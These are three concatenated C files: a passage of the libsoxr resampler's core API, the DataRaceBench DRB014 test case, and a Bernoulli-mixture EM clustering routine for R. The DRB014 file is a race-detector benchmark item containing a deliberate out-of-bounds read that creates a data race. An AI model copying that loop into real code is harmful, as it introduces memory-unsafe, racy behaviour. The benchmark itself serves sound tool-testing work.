"mov %%ebx, %%edi \n\t" \
"cpuid \n\t" \
"xchg %%edi, %%ebx \n\t" \
: "=a" (eax_), "=D" (ebx_), "=c" (ecx_), "=d" (edx_) \
: "a" (type), "c" (0));
#elif defined _M_X64 && defined _MSC_VER && _MSC_VER > 1500
void __cpuidex(int CPUInfo[4], int info_type, int ecxvalue);
#pragma intrinsic(__cpuidex)
#define CPUID(type, eax_, ebx_, ecx_, edx_) do { \
int regs[4]; \
__cpuidex(regs, type, 0); \
eax_ = regs[0], ebx_ = regs[1], ecx_ = regs[2], edx_ = regs[3]; \
} while(0)
#elif defined _M_X64 && defined _MSC_VER
void __cpuidex(int CPUInfo[4], int info_type);
#pragma intrinsic(__cpuidex)
#define CPUID(type, eax_, ebx_, ecx_, edx_) do { \
int regs[4]; \
__cpuidex(regs, type); \
eax_ = regs[0], ebx_ = regs[1], ecx_ = regs[2], edx_ = regs[3]; \
} while(0)
#elif defined _M_IX86 && defined _MSC_VER
#define CPUID(type, eax_, ebx_, ecx_, edx_) \
__asm pushad \
__asm mov eax, type \
__asm xor ecx, ecx \
__asm cpuid \
__asm mov eax_, eax \
__asm mov ebx_, ebx \
__asm mov ecx_, ecx \
__asm mov edx_, edx \
__asm popad
#endif
#endif
#if WITH_CR32S && WITH_CR32
static bool cpu_has_simd32(void)
{
#if defined __x86_64__ || defined _M_X64
return true;
#elif defined __i386__ || defined _M_IX86
enum {SSE = 1 << 25, SSE2 = 1 << 26};
unsigned eax_, ebx_, ecx_, edx_;
CPUID(1, eax_, ebx_, ecx_, edx_);
return (edx_ & (SSE|SSE2)) != 0;
#elif defined AV_CPU_FLAG_NEON
return !!(av_get_cpu_flags() & AV_CPU_FLAG_NEON);
#else
return false;
#endif
}
static bool should_use_simd32(void)
{
char const * e;
return ((e = getenv("SOXR_USE_SIMD" )))? !!atoi(e) :
((e = getenv("SOXR_USE_SIMD32")))? !!atoi(e) : cpu_has_simd32();
}
#else
#define should_use_simd32() true
#endif
#if WITH_CR64S && WITH_CR64
#if defined __GNUC__
#define XGETBV(type, eax_, edx_) \
__asm__ __volatile__ ( \
".byte 0x0f, 0x01, 0xd0\n" \
: "=a"(eax_), "=d"(edx_) : "c" (type));
#elif defined _M_X64 && defined _MSC_FULL_VER && _MSC_FULL_VER >= 160040219
#include <immintrin.h>
#define XGETBV(type, eax_, edx_) do { \
union {uint64_t x; uint32_t y[2];} a = {_xgetbv(0)}; \
eax_ = a.y[0], edx_ = a.y[1]; \
} while(0)
#elif defined _M_IX86 && defined _MSC_VER
#define XGETBV(type, eax_, edx_) \
__asm pushad \
__asm mov ecx, type \
__asm _emit 0x0f \
__asm _emit 0x01 \
__asm _emit 0xd0 \
__asm mov eax_, eax \
__asm mov edx_, edx \
__asm popad
#else
#define XGETBV(type, eax_, edx_) eax_ = edx_ = 0
#endif
static bool cpu_has_simd64(void)
{
enum {OSXSAVE = 1 << 27, AVX = 1 << 28};
unsigned eax_, ebx_, ecx_, edx_;
CPUID(1, eax_, ebx_, ecx_, edx_);
if ((ecx_ & (OSXSAVE|AVX)) == (OSXSAVE|AVX)) {
XGETBV(0, eax_, edx_);
return (eax_ & 6) == 6;
}
return false;
}
static bool should_use_simd64(void)
{
char const * e;
return ((e = getenv("SOXR_USE_SIMD" )))? !!atoi(e) :
((e = getenv("SOXR_USE_SIMD64")))? !!atoi(e) : cpu_has_simd64();
}
#else
#define should_use_simd64() true
#endif
extern control_block_t
_soxr_rate32_cb,
_soxr_rate32s_cb,
_soxr_rate64_cb,
_soxr_rate64s_cb,
_soxr_vr32_cb;
static void runtime_num(char const * env_name,
int min, int max, unsigned * field)
{
char const * e = getenv(env_name);
if (e) {
int i = atoi(e);
if (i >= min && i <= max)
*field = (unsigned)i;
}
}
static void runtime_flag(char const * env_name,
unsigned n_bits, unsigned n_shift, unsigned long * flags)
{
char const * e = getenv(env_name);
if (e) {
int i = atoi(e);
unsigned long mask = (1UL << n_bits) - 1;
if (i >= 0 && i <= (int)mask)
*flags &= ~(mask << n_shift), *flags |= ((unsigned long)i << n_shift);
}
}
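#if 0 /* Illustration only, not part of libsoxr: what runtime_flag does for,
         e.g., SOXR_COEF_INTERP=2 with n_bits=2, n_shift=0. */
static void runtime_flag_demo(void)
{
unsigned long flags = 0xf0UL; /* pre-existing bits, to be preserved */
unsigned long mask = (1UL << 2) - 1; /* 0x3: a 2-bit field at shift 0 */
flags &= ~(mask << 0), flags |= (2UL << 0);
/* flags is now 0xf2: the high bits survive, the low 2-bit field is 2 */
}
#endif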
soxr_t soxr_create(
double input_rate, double output_rate,
unsigned num_channels,
soxr_error_t * error0,
soxr_io_spec_t const * io_spec,
soxr_quality_spec_t const * q_spec,
soxr_runtime_spec_t const * runtime_spec)
{
double io_ratio = output_rate!=0? input_rate!=0?
input_rate / output_rate : -1 : input_rate!=0? -1 : 0;
static const float datatype_full_scale[] = {1, 1, 65536.*32768, 32768};
soxr_t p = 0;
soxr_error_t error = 0;
#if WITH_DEV_TRACE
#define _(x) (char)(sizeof(x)>=10? 'a'+(char)(sizeof(x)-10):'0'+(char)sizeof(x))
char const * e = getenv("SOXR_TRACE");
_soxr_trace_level = e? atoi(e) : 0;
{
static char const arch[] = {_(char), _(short), _(int), _(long), _(long long)
, ' ', _(float), _(double), _(long double)
, ' ', _(int *), _(int (*)(int))
, ' ', HAVE_BIGENDIAN ? 'B' : 'L'
#if defined _OPENMP
, ' ', 'O', 'M', 'P'
#endif
, 0};
#undef _
lsx_debug("arch: %s", arch);
}
#endif
if (q_spec && q_spec->e) error = q_spec->e;
else if (io_spec && (io_spec->itype | io_spec->otype) >= SOXR_SPLIT * 2)
error = "invalid io datatype(s)";
if (!error && !(p = calloc(sizeof(*p), 1))) error = "malloc failed";
if (p) {
control_block_t * control_block;
p->q_spec = q_spec? *q_spec : soxr_quality_spec(SOXR_HQ, 0);
if (q_spec) { /* Backwards compatibility with original API: */
if (p->q_spec.passband_end > 2)
p->q_spec.passband_end /= 100;
if (p->q_spec.stopband_begin > 2)
p->q_spec.stopband_begin = 2 - p->q_spec.stopband_begin / 100;
}
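/* e.g. a legacy passband_end of 91.3 (percent) becomes 0.913, and a
   legacy stopband_begin of 110 becomes 2 - 110/100 = 0.90. */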
p->io_ratio = io_ratio;
p->num_channels = num_channels;
if (io_spec)
p->io_spec = *io_spec;
else
p->io_spec.scale = 1;
p->runtime_spec = runtime_spec? *runtime_spec : soxr_runtime_spec(1);
runtime_num("SOXR_MIN_DFT_SIZE", 8, 15, &p->runtime_spec.log2_min_dft_size);
runtime_num("SOXR_LARGE_DFT_SIZE", 8, 20, &p->runtime_spec.log2_large_dft_size);
runtime_num("SOXR_COEFS_SIZE", 100, 800, &p->runtime_spec.coef_size_kbytes);
runtime_num("SOXR_NUM_THREADS", 0, 64, &p->runtime_spec.num_threads);
runtime_flag("SOXR_COEF_INTERP", 2, 0, &p->runtime_spec.flags);
runtime_flag("SOXR_STRICT_BUF", 1, 2, &p->runtime_spec.flags);
runtime_flag("SOXR_NOSMALLINTOPT", 1, 3, &p->runtime_spec.flags);
p->io_spec.scale *= datatype_full_scale[p->io_spec.otype & 3] /
datatype_full_scale[p->io_spec.itype & 3];
p->seed = (unsigned long)time(0) ^ (unsigned long)(size_t)p;
#if WITH_CR32 || WITH_CR32S || WITH_VR32
if (0
#if WITH_VR32
|| ((!WITH_CR32 && !WITH_CR32S) || (p->q_spec.flags & SOXR_VR))
#endif
#if WITH_CR32 || WITH_CR32S
|| !(WITH_CR64 || WITH_CR64S) || (p->q_spec.precision <= 20 && !(p->q_spec.flags & SOXR_DOUBLE_PRECISION))
#endif
) {
p->deinterleave = (deinterleave_t)_soxr_deinterleave_f;
p->interleave = (interleave_t)_soxr_interleave_f;
control_block =
#if WITH_VR32
((!WITH_CR32 && !WITH_CR32S) || (p->q_spec.flags & SOXR_VR))? &_soxr_vr32_cb :
#endif
#if WITH_CR32S
!WITH_CR32 || should_use_simd32()? &_soxr_rate32s_cb :
#endif
&_soxr_rate32_cb;
}
#if WITH_CR64 || WITH_CR64S
else
#endif
#endif
#if WITH_CR64 || WITH_CR64S
{
p->deinterleave = (deinterleave_t)_soxr_deinterleave;
p->interleave = (interleave_t)_soxr_interleave;
control_block =
#if WITH_CR64S
!WITH_CR64 || should_use_simd64()? &_soxr_rate64s_cb :
#endif
&_soxr_rate64_cb;
}
#endif
memcpy(&p->control_block, control_block, sizeof(p->control_block));
if (p->num_channels && io_ratio!=0)
error = soxr_set_io_ratio(p, io_ratio, 0);
}
if (error)
soxr_delete(p), p = 0;
if (error0)
*error0 = error;
return p;
}
soxr_error_t soxr_set_input_fn(soxr_t p,
soxr_input_fn_t input_fn, void * input_fn_state, size_t max_ilen)
{
p->input_fn_state = input_fn_state;
p->input_fn = input_fn;
p->max_ilen = max_ilen? max_ilen : (size_t)-1;
return 0;
}
static void soxr_delete0(soxr_t p)
{
unsigned i;
if (p->resamplers) for (i = 0; i < p->num_channels; ++i) {
if (p->resamplers[i])
resampler_close(p->resamplers[i]);
free(p->resamplers[i]);
}
free(p->resamplers);
free(p->channel_ptrs);
free(p->shared);
memset(p, 0, sizeof(*p));
}
double soxr_delay(soxr_t p)
{
return
(p && !p->error && p->resamplers)? resampler_delay(p->resamplers[0]) : 0;
}
static soxr_error_t fatal_error(soxr_t p, soxr_error_t error)
{
soxr_delete0(p);
return p->error = error;
}
static soxr_error_t initialise(soxr_t p)
{
unsigned i;
size_t shared_size, channel_size;
resampler_sizes(&shared_size, &channel_size);
p->channel_ptrs = calloc(sizeof(*p->channel_ptrs), p->num_channels);
p->shared = calloc(shared_size, 1);
p->resamplers = calloc(sizeof(*p->resamplers), p->num_channels);
if (!p->shared || !p->channel_ptrs || !p->resamplers)
return fatal_error(p, "malloc failed");
for (i = 0; i < p->num_channels; ++i) {
soxr_error_t error;
if (!(p->resamplers[i] = calloc(channel_size, 1)))
return fatal_error(p, "malloc failed");
error = resampler_create(
p->resamplers[i],
p->shared,
p->io_ratio,
&p->q_spec,
&p->runtime_spec,
p->io_spec.scale);
if (error)
return fatal_error(p, error);
}
return 0;
}
soxr_error_t soxr_set_num_channels(soxr_t p, unsigned num_channels)
{
if (!p) return "invalid soxr_t pointer";
if (num_channels == p->num_channels) return p->error;
if (!num_channels) return "invalid # of channels";
if (p->resamplers) return "# of channels can't be changed";
p->num_channels = num_channels;
return soxr_set_io_ratio(p, p->io_ratio, 0);
}
soxr_error_t soxr_set_io_ratio(soxr_t p, double io_ratio, size_t slew_len)
{
unsigned i;
soxr_error_t error;
if (!p) return "invalid soxr_t pointer";
if ((error = p->error)) return error;
if (!p->num_channels) return "must set # channels before O/I ratio";
if (io_ratio <= 0) return "I/O ratio out-of-range";
if (!p->channel_ptrs) {
p->io_ratio = io_ratio;
return initialise(p);
}
if (p->control_block[8]) {
for (i = 0; !error && i < p->num_channels; ++i)
resampler_set_io_ratio(p->resamplers[i], io_ratio, slew_len);
return error;
}
return fabs(p->io_ratio - io_ratio) < 1e-15? 0 :
"varying O/I ratio is not supported with this quality level";
}
void soxr_delete(soxr_t p)
{
if (p)
soxr_delete0(p), free(p);
}
soxr_error_t soxr_clear(soxr_t p) /* TODO: this, properly. */
{
if (p) {
struct soxr tmp = *p;
soxr_delete0(p);
memset(p, 0, sizeof(*p));
p->input_fn = tmp.input_fn;
p->runtime_spec = tmp.runtime_spec;
p->q_spec = tmp.q_spec;
p->io_spec = tmp.io_spec;
p->num_channels = tmp.num_channels;
p->input_fn_state = tmp.input_fn_state;
memcpy(p->control_block, tmp.control_block, sizeof(p->control_block));
p->deinterleave = tmp.deinterleave;
p->interleave = tmp.interleave;
return (p->q_spec.flags & RESET_ON_CLEAR)?
soxr_set_io_ratio(p, tmp.io_ratio, 0) : 0;
}
return "invalid soxr_t pointer";
}
static void soxr_input_1ch(soxr_t p, unsigned i, soxr_cbuf_t src, size_t len)
{
sample_t * dest = resampler_input(p->resamplers[i], NULL, len);
(*p->deinterleave)(&dest, p->io_spec.itype, &src, len, 1);
}
static size_t soxr_input(soxr_t p, void const * in, size_t len)
{
bool separated = !!(p->io_spec.itype & SOXR_SPLIT);
unsigned i;
if (!p || p->error) return 0;
if (!in && len) {p->error = "null input buffer pointer"; return 0;}
if (!len) {
p->flushing = true;
return 0;
}
if (separated)
for (i = 0; i < p->num_channels; ++i)
soxr_input_1ch(p, i, ((soxr_cbufs_t)in)[i], len);
else {
for (i = 0; i < p->num_channels; ++i)
p->channel_ptrs[i] = resampler_input(p->resamplers[i], NULL, len);
(*p->deinterleave)(
(sample_t **)p->channel_ptrs, p->io_spec.itype, &in, len, p->num_channels);
}
return len;
}
static size_t soxr_output_1ch(soxr_t p, unsigned i, soxr_buf_t dest, size_t len, bool separated)
{
sample_t const * src;
if (p->flushing)
resampler_flush(p->resamplers[i]);
resampler_process(p->resamplers[i], len);
src = resampler_output(p->resamplers[i], NULL, &len);
if (separated)
p->clips += (p->interleave)(p->io_spec.otype, &dest, &src,
len, 1, (p->io_spec.flags & SOXR_NO_DITHER)? 0 : &p->seed);
else p->channel_ptrs[i] = (void /* const */ *)src;
return len;
}
static size_t soxr_output_no_callback(soxr_t p, soxr_buf_t out, size_t len)
{
unsigned u;
size_t done = 0;
bool separated = !!(p->io_spec.otype & SOXR_SPLIT);
#if defined _OPENMP
int i;
if (!p->runtime_spec.num_threads && p->num_channels > 1)
#pragma omp parallel for
for (i = 0; i < (int)p->num_channels; ++i) {
size_t done1;
done1 = soxr_output_1ch(p, (unsigned)i, ((soxr_bufs_t)out)[i], len, separated);
if (!i)
done = done1;
} else
#endif
for (u = 0; u < p->num_channels; ++u)
done = soxr_output_1ch(p, u, ((soxr_bufs_t)out)[u], len, separated);
if (!separated)
p->clips += (p->interleave)(p->io_spec.otype, &out, (sample_t const * const *)p->channel_ptrs,
done, p->num_channels, (p->io_spec.flags & SOXR_NO_DITHER)? 0 : &p->seed);
return done;
}
size_t soxr_output(soxr_t p, void * out, size_t len0)
{
size_t odone, odone0 = 0, olen = len0, osize, idone;
size_t ilen = min(p->max_ilen, (size_t)ceil((double)olen *p->io_ratio));
void const * in = out; /* Set to !=0, so that caller may leave unset. */
bool was_flushing;
if (!p || p->error) return 0;
if (!out && len0) {p->error = "null output buffer pointer"; return 0;}
do {
odone = soxr_output_no_callback(p, out, olen);
odone0 += odone;
if (odone0 == len0 || !p->input_fn || p->flushing)
break;
osize = soxr_datatype_size(p->io_spec.otype) * p->num_channels;
out = (char *)out + osize * odone;
olen -= odone;
idone = p->input_fn(p->input_fn_state, &in, ilen);
was_flushing = p->flushing;
if (!in)
p->error = "input function reported failure";
else soxr_input(p, in, idone);
} while (odone || idone || (!was_flushing && p->flushing));
return odone0;
}
static size_t soxr_i_for_o(soxr_t p, size_t olen, size_t ilen)
{
size_t result;
#if 0
if (p->runtime_spec.flags & SOXR_STRICT_BUFFERING)
result = rate_i_for_o(p->resamplers[0], olen);
else
#endif
result = (size_t)ceil((double)olen * p->io_ratio);
return min(result, ilen);
}
#if 0
static size_t soxr_o_for_i(soxr_t p, size_t ilen, size_t olen)
{
size_t result = (size_t)ceil((double)ilen / p->io_ratio);
return min(result, olen);
}
#endif
soxr_error_t soxr_process(soxr_t p,
void const * in , size_t ilen0, size_t * idone0,
void * out, size_t olen , size_t * odone0)
{
size_t ilen, idone, odone = 0;
unsigned u;
bool flush_requested = false;
if (!p) return "null pointer";
if (!in)
flush_requested = true, ilen = ilen0 = 0;
else {
if ((ptrdiff_t)ilen0 < 0)
flush_requested = true, ilen0 = ~ilen0;
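/* (callers such as soxr_oneshot() pass ~ilen, which is negative for any
   non-negative ilen, to request a flush while still conveying the length) */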
if (idone0 && (1 || flush_requested))
ilen = soxr_i_for_o(p, olen, ilen0);
else
ilen = ilen0/*, olen = soxr_o_for_i(p, ilen, olen)*/;
}
p->flushing |= ilen == ilen0 && flush_requested;
if (!out && !in)
idone = ilen;
else if (p->io_spec.itype & p->io_spec.otype & SOXR_SPLIT) { /* Both i & o */
#if defined _OPENMP
int i;
if (!p->runtime_spec.num_threads && p->num_channels > 1)
#pragma omp parallel for
for (i = 0; i < (int)p->num_channels; ++i) {
size_t done;
if (in)
soxr_input_1ch(p, (unsigned)i, ((soxr_cbufs_t)in)[i], ilen);
done = soxr_output_1ch(p, (unsigned)i, ((soxr_bufs_t)out)[i], olen, true);
if (!i)
odone = done;
} else
#endif
for (u = 0; u < p->num_channels; ++u) {
if (in)
soxr_input_1ch(p, u, ((soxr_cbufs_t)in)[u], ilen);
odone = soxr_output_1ch(p, u, ((soxr_bufs_t)out)[u], olen, true);
}
idone = ilen;
}
else {
idone = ilen? soxr_input (p, in , ilen) : 0;
odone = soxr_output(p, out, olen);
}
if (idone0) *idone0 = idone;
if (odone0) *odone0 = odone;
return p->error;
}
soxr_error_t soxr_oneshot(
double irate, double orate,
unsigned num_channels,
void const * in , size_t ilen, size_t * idone,
void * out, size_t olen, size_t * odone,
soxr_io_spec_t const * io_spec,
soxr_quality_spec_t const * q_spec,
soxr_runtime_spec_t const * runtime_spec)
{
soxr_t resampler;
soxr_error_t error = q_spec? q_spec->e : 0;
if (!error) {
soxr_quality_spec_t q_spec1;
if (!q_spec)
q_spec1 = soxr_quality_spec(SOXR_LQ, 0), q_spec = &q_spec1;
resampler = soxr_create(irate, orate, num_channels,
&error, io_spec, q_spec, runtime_spec);
}
if (!error) {
error = soxr_process(resampler, in, ~ilen, idone, out, olen, odone);
soxr_delete(resampler);
}
return error;
}
soxr_error_t soxr_set_error(soxr_t p, soxr_error_t error)
{
if (!p) return "null pointer";
if (!p->error && p->error != error) return p->error;
p->error = error;
return 0;
}
|
DRB014-outofbounds-orig-yes.c | // RUN: clang %loadLLOV %s -o /dev/null 2>&1 | FileCheck %s
/*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
The outermost loop is parallelized.
But the inner loop has an out-of-bounds access to b[i][j-1] when j equals 0.
This will cause a memory access of a previous row's last element.
For example, an array of 4x4:
j=0 1 2 3
i=0 x x x x
1 x x x x
2 x x x x
3 x x x x
outer loop: i=2,
inner loop: j=0
array element accessed b[i][j-1] becomes b[2][-1], which in turn is b[1][3]
due to linearized row-major storage of the 2-D array.
This causes loop-carried data dependence between i=2 and i=1.
Data race pair: b[i][j]@75 vs. b[i][j-1]@75.
*/
#include <stdio.h>
int main(int argc, char* argv[])
{
int i,j;
int n=100, m=100;
double b[n][m];
#pragma omp parallel for private(j)
for (i=1;i<n;i++)
for (j=0;j<m;j++) // Note there will be out of bound access
b[i][j]=b[i][j-1];
printf ("b[50][50]=%f\n",b[50][50]);
return 0;
}
// CHECK: Data Race detected
// END
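// A race-free variant, for reference (a sketch, not part of the benchmark):
// starting the inner loop at j=1 removes the cross-row read of the previous
// row's last element; the remaining b[i][j-1] dependence stays within row i,
// which each thread executes sequentially, so the outer loop parallelizes safely.
//
//   #pragma omp parallel for private(j)
//   for (i=1;i<n;i++)
//     for (j=1;j<m;j++)
//       b[i][j]=b[i][j-1];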
|
bmm_em.c | #include "bmm_em.h"
#include "float.h"
#include "Rinternals.h"
#include "R.h"
#include <omp.h>
void free_bmm_em_result(bmm_em_result* x) {
free(x->pis);
for (int k = 0; k < x->K; k++) {
free(x->protos[k]);
}
free(x->protos);
free(x->cluster);
}
bmm_em_result em(Dataset* ds, int K, int max_iter, int verbose, int hbbmm) {
/** Allocate space **/
//double** protos = sample_prototypes(ds, K);
double** protos = sample_prototypes_hypercube(ds, K);
double* pis = sample_pis(K);
double** z = alloc_z(ds->N, K, ds->D);
// calculate alpha and beta estimates
double alpha, beta;
empirical_bayes(ds, &alpha, &beta);
//Rprintf("alph=%f | beta=%f\n", alpha, beta);
double thresh = 1e-6;
int converged = 0;
double prev = 0;
double ll = -DBL_MAX;
int iter = 0;
while (iter < max_iter && !converged) {
prev = ll;
ll = 0;
// Expectation & log likelihood
ll = log_z_nk(ds, z, pis, protos, K);
if (verbose) {
Rprintf(" %4d | %15.4f\n", iter, ll);
}
// Check converged
if (ll - prev < thresh) {
converged = 1;
if (verbose) {
Rprintf("-- Converged --\n");
}
break;
}
// M-Step /////////////
p_k(pis, z, K, ds->N);
// Pass alpha and beta here
for (int k = 0; k < K; k++) {
if (hbbmm) {
proto_k_hbbmm(ds, z, protos[k], k, alpha, beta);
} else {
proto_k(ds, z, protos[k], k);
}
}
// End M-Step /////////
iter++;
}
// get cluster
int * cluster = (int*) calloc(ds->N, sizeof(int));
for (int n = 0; n < ds->N; n++) {
double max = 0;
for (int k = 0; k < K; k++) {
if (z[n][k] > max) {
max = z[n][k];
cluster[n] = k;
}
}
}
// free everything
for (int n = 0; n < ds->N; n++) {
free(z[n]);
}
free(z);
bmm_em_result result = {
.protos = protos,
.pis = pis,
.cluster = cluster,
.D = ds->D,
.K = K,
.ll = ll
};
return result;
}
double clip(double x) {
double lo = 0.000000001;
double hi = 0.999999999;
if (x < lo) {
x = lo;
} else if (x > hi) {
x = hi;
}
return x;
}
// likelihood of xn given cluster k
double log_p_xn_k(Dataset* ds, int row, double* proto) {
double ll = 0;
double mu;
for (int i = 0; i < ds->D; i++) {
mu = clip(proto[i]);
//mu = proto[i];
ll += at(ds, row, i) ? log(mu) : log(1 - mu);
}
return ll;
}
double log_z_nk(Dataset* ds, double** z, double* pis, double** protos, int K) {
double ll = 0;
double * tmp;
#pragma omp parallel for private(tmp) reduction (+:ll)
for (int n = 0; n < ds->N; n++) {
tmp = (double*) malloc(K * sizeof(double));
double max = -DBL_MAX;
for (int k = 0; k < K; k++) {
tmp[k] = log(pis[k]) + log_p_xn_k(ds, n, protos[k]);
z[n][k] = tmp[k];
// Keep track of the max for logsumexp trick
if (z[n][k] > max) {
max = z[n][k];
}
}
// logsumexp trick
double rowsum = 0;
for (int k = 0; k < K; k++) {
rowsum += exp(z[n][k] - max);
}
rowsum = max + log(rowsum);
//Rprintf("z[n][k]=");
// normalize by dividing by rowsums
for (int k = 0; k < K; k++) {
z[n][k] -= rowsum;
z[n][k] = exp(z[n][k]);
//Rprintf(" %f", z[n][k]);
ll += z[n][k] * tmp[k];
}
//Rprintf("\n");
free(tmp);
}
return ll;
}
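/* For reference: the log-sum-exp identity used above, as a standalone sketch
   (not called by the original code). Subtracting the max keeps every exp()
   argument <= 0, so the sum cannot overflow:
   log(sum_k exp(v[k])) == max_v + log(sum_k exp(v[k] - max_v)). */
static double logsumexp_sketch(const double* v, int K) {
double max_v = -DBL_MAX;
for (int k = 0; k < K; k++) {
if (v[k] > max_v) {
max_v = v[k];
}
}
double s = 0;
for (int k = 0; k < K; k++) {
s += exp(v[k] - max_v);
}
return max_v + log(s);
}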
void p_k(double* pis, double** z, int K, int N) {
#pragma omp parallel for shared(pis, z)
for (int k = 0; k < K; k++) {
pis[k] = 0; // reset to zero
for (int n = 0; n < N; n++) {
pis[k] += z[n][k];
}
// normalize the soft counts into mixing proportions
pis[k] /= N;
}
}
void proto_k(Dataset* ds, double** z, double* proto, int k) {
#pragma omp parallel for shared(proto, z)
for (int i = 0; i < ds->D; i++) {
double num = 0;
double den = 0;
for (int n = 0; n < ds->N; n++) {
num += z[n][k] * at(ds, n, i);
den += z[n][k];
}
proto[i] = clip(num / den);
}
}
void proto_k_hbbmm(Dataset* ds, double** z, double* proto, int k, double alpha, double beta) {
#pragma omp parallel for shared(proto, z)
for (int i = 0; i < ds->D; i++) {
double num = 0;
double den = 0;
for (int n = 0; n < ds->N; n++) {
num += z[n][k] * at(ds, n, i);
den += z[n][k];
}
//proto[i] = clip( (num / den);
proto[i] = (num + alpha - 1.0) / (den + alpha + beta - 2.0);
}
}
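/* The hbbmm update above is the MAP (posterior-mode) estimate under a
   Beta(alpha, beta) prior on each Bernoulli mean: with soft counts
   s = sum_n z[n][k]*x[n][i] and m = sum_n z[n][k], the posterior mode is
   (s + alpha - 1) / (m + alpha + beta - 2). */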
double loglik(Dataset* ds, double** z, double* pis, double** protos, int K) {
double ll = 0;
for (int n = 0; n < ds->N; n++) {
for (int k = 0; k < K; k++) {
ll += z[n][k] * (log(pis[k]) + log_p_xn_k(ds, n, protos[k]));
////Rprintf("z[n][k]= %f\n", z[n][k]);
}
}
return ll;
}
double* sample_pis(int K) {
double* pis = (double*) calloc(K, sizeof(double));
for (int k = 0; k < K; k++) {
pis[k] = 1.0/K;
}
return pis;
}
double** sample_prototypes_hypercube(Dataset* ds, int K) {
double** protos = (double**) calloc(K, sizeof(double*));
for (int k = 0; k < K; k++) {
protos[k] = (double*) calloc(ds->D, sizeof(double));
}
// randomly sample a row from x
for (int k = 0; k < K; k++) {
// loop over bits
for (int i = 0; i < ds->D; i++) {
GetRNGstate();
double rand = (unif_rand() - 0.50) * 1e-2;
PutRNGstate();
protos[k][i] = 0.50 + rand;
}
}
return protos;
}
double** sample_prototypes(Dataset* ds, int K) {
double** protos = (double**) calloc(K, sizeof(double*));
for (int k = 0; k < K; k++) {
protos[k] = (double*) calloc(ds->D, sizeof(double));
}
// randomly sample a row from x
for (int k = 0; k < K; k++) {
GetRNGstate();
int row = floor(unif_rand() * ds->N);
PutRNGstate();
// loop over bits
for (int i = 0; i < ds->D; i++) {
GetRNGstate();
double rand = unif_rand();
PutRNGstate();
protos[k][i] = 0.25*at(ds, row, i) + 0.75*rand;
}
}
return protos;
}
double** alloc_z(int N, int K, int D) {
double** z = (double**) calloc(N, sizeof(double*));
for (int n = 0; n < N; n++) {
z[n] = (double*) calloc(K, sizeof(double));
for (int k = 0; k < K; k++) {
z[n][k] = 1.0/K;
}
}
return z;
}
SEXP convert_bmm_em_result(Dataset* ds, bmm_em_result * res, int* prtCnt) {
/** Return the following:
* prototypes as matrix
* pis as numeric vector
* cluster as integer vector
* K, D, ll?
*/
SEXP out = PROTECT(Rf_allocVector(VECSXP, 4));
(*prtCnt)++;
SEXP protos = PROTECT(Rf_allocMatrix(REALSXP, ds->D, res->K));
(*prtCnt)++;
SEXP pis = PROTECT(Rf_allocVector(REALSXP, res->K));
(*prtCnt)++;
SEXP cluster = PROTECT(Rf_allocVector(INTSXP, ds->N));
(*prtCnt)++;
SEXP ll = PROTECT(Rf_allocVector(REALSXP, 1));
(*prtCnt)++;
// TODO: change iteration to avoid tranposing on back end
// copy data to R vectors
for (int k = 0; k < res->K; k++) {
memcpy(&REAL(protos)[k * ds->D], res->protos[k], ds->D * sizeof(double));
}
memcpy(REAL(pis), res->pis, res->K * sizeof(double));
memcpy(INTEGER(cluster), res->cluster, ds->N * sizeof(int));
*REAL(ll) = res->ll;
SEXP names = PROTECT(Rf_allocVector(STRSXP, 4));
(*prtCnt)++;
SET_VECTOR_ELT(out, 0, protos);
SET_VECTOR_ELT(out, 1, pis);
SET_VECTOR_ELT(out, 2, cluster);
SET_VECTOR_ELT(out, 3, ll);
SET_STRING_ELT(names, 0, Rf_mkChar("prototypes"));
SET_STRING_ELT(names, 1, Rf_mkChar("pis"));
SET_STRING_ELT(names, 2, Rf_mkChar("cluster"));
SET_STRING_ELT(names, 3, Rf_mkChar("ll"));
Rf_setAttrib(out, R_NamesSymbol, names);
return out;
}
znk_result predict_log_z_nk(Dataset *ds, double* pis, double** protos, int K) {
double** z = alloc_z(ds->N, K, ds->D);
double ll = 0;
#pragma omp parallel for
for (int n = 0; n < ds->N; n++) {
for (int k = 0; k < K; k++) {
z[n][k] = log_p_xn_k(ds, n, protos[k]);
}
}
znk_result res = {.z = z, .ll = ll, .K = K};
return (res);
};
void free_znk_result(znk_result* x) {
// NOTE: x->z was allocated by alloc_z() with one row per data point (ds->N
// rows), but only x->K rows are freed here; when N != K this leaks rows
// (or over-frees when K > N). A proper fix would record N in znk_result.
for (int k = 0; k < x->K; k++) {
free(x->z[k]);
}
free(x->z);
};
SEXP convert_znk_result(Dataset* ds, znk_result * res, int* prtCnt) {
